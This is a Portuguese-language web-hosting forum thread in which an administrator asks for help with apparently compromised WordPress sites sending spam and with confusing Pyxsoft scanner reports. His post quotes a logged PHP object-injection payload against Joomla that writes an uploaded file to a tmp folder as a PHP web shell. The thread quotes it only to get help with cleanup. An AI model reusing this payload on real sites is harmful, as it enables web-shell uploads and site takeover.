Jump to content

WP infectado + Pyxsoft


Rodrigo O. Lima

Recommended Posts

Bom dia galera!

Dê-me um help!

1) Tenho alguns clientes com Wordpress e acho que estão com plugins infectados, pois uma conta começou a disparar spam sem ter sido o cliente.

Qual comando posso rodar no servidor para verificar isso?

2) Instalei o Pyxsoft para testar, fiz uma varredura completa no servidor e ele diz que não há malware, porém no relatório de email ele diz que há 1 malware L

Fiquei confuso, pois é controverso o relatório e a varredura.

Se realmente tem 1 malware como vou encontrar se ele não diz?

3) Hoje o Pyxsoft me deu essa mensagem:

05/04/2016

91.135.65.69,}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:137:"printcopy($_FILES[file][tmp_name],dirname(JFactory::getConfig()->get(base64_decode(bG9nX3BhdGg))).base64_decode(L3RtcC9zZngucGhw));exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}

JI5c22S.php

/Home/USER/public_html/

Forbidden.php in http uploads  

Fiz uma busca nesta pasta que ele indica e não encontro esse arquivo.php

Não consta nada em quarentena e na varredura desta conta diz que não há nada L

Alguém dá uma luz?

Toda ajuda é bem-vinda!

Obrigado.

Link to comment
Share on other sites

A primeira coisa que faço é aviso ao cliente de 5 horas. Após isto, bloqueio. O cliente tem que resolver estas questões.

Mas, se você quer ajuda-lo, desativar o plugin já ajuda.

E buscar sempre por arquivos maliciosos em várias pastas. Arquivo Forbidden geralmente é para página não entrada. Faça uma busca por nome de arquivo e veja se encontra algum relacionado dentro da conta do servidor. O Plugin WHM ConfigExplorer ajuda muito neste caso. Mas, pelo próprio cPanel já consegue localizar algo.

Lembre-se: mantenha sempre o Wordpress e plugins atualizados.

 

Ajude o fórum! Antes de postar, leiam as regras de postagem aqui.

Link to comment
Share on other sites

Em 05/05/2016 at 10:39, Anger disse:

A primeira coisa que faço é aviso ao cliente de 5 horas. Após isto, bloqueio. O cliente tem que resolver estas questões.

Mas, se você quer ajuda-lo, desativar o plugin já ajuda.

E buscar sempre por arquivos maliciosos em várias pastas. Arquivo Forbidden geralmente é para página não entrada. Faça uma busca por nome de arquivo e veja se encontra algum relacionado dentro da conta do servidor. O Plugin WHM ConfigExplorer ajuda muito neste caso. Mas, pelo próprio cPanel já consegue localizar algo.

Lembre-se: mantenha sempre o Wordpress e plugins atualizados.

 

Obrigado @Anger!

Tive que excluir todo WP mesmo, acabei encontrando o danado.

Agora só acho estranho o Pyxsoft no cron manda um email dizendo que tem1 malware, no escaneamento geral diz que não tem nada :/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...

Important Information

Do you agree with our terms?